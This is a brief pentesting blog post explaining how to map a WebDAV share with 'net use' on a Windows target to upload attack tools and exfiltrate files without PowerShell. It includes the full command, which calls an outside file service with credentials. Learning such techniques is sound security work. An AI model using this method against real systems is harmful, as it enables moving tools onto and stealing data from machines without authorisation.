NeilSec: Security Learning Blog

Pentesting, infosec, hacking, learning.

  • Home
  • Knowledgebase
You are here: Home / Penetration Testing / How to download & upload files via Windows command line / terminal / cmd.exe (without Powershell)

How to download & upload files via Windows command line / terminal / cmd.exe (without Powershell)

2019-03-20 by Neil Leave a Comment

The lack of native commands for simple downloading of pentesting tools in Windows is often bemoaned, especially in comparison to linux where commands like wget are generally installed and easy to use.#

The first port of call is to use Powershell but that isn’t always possible in earlier version of Windows, and I’ve been told you cannot do it easily via Windows command line.

It turns it out it’s pretty simple if you do it via webdav. First you need to set up webdav on a server somewhere. You can set up webdav on your Kali machine using widely available instructions. Here I used a free web-based file service called Opendrive.

Set up a free Opendrive account and move your tools into the Documents folder as per their instructions and note the username and password of course.

Now on the target Windows box use the following commands:

net use * https://webdav.opendrive.com/Documents/ password1234 /USER:neil@neilsec.com

Windows will report back that it has mapped a drive such as Z: to this webdav share.

Now you can copy files to and from the Z: at will making it a snap to upload tools or exfiltrate files.

When you’re finished: net use Z: /DELETE will tidy up for you.

Filed Under: Penetration Testing

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

About Me

I’m currently a systems admin / consultant at a IT firm who looks after the computer systems of small businesses in the UK. IT security is only a part of that job. However I’ve always enjoyed breaking into, getting around, subverting and otherwise hacking things, systems and ideas. In tackling some low-level IT security tasks I reignited my interest in the field and this blog charts my progress in the world of Computer Security, legal Hacking, Penetration Testing, Infosec – whatever you want to call it. As a Windows guy I’m learning about Linux, shell-scripting, python and all the other skills needed in this field.

Tags

Apache Boot-to-Root CTF curl dib Dirbuster FreeBSD Hack The Box Linux mysql NFS Penetration Testing PHP RCE shell VulnHub Wordpress

Categories

© 2023 · NeilSec;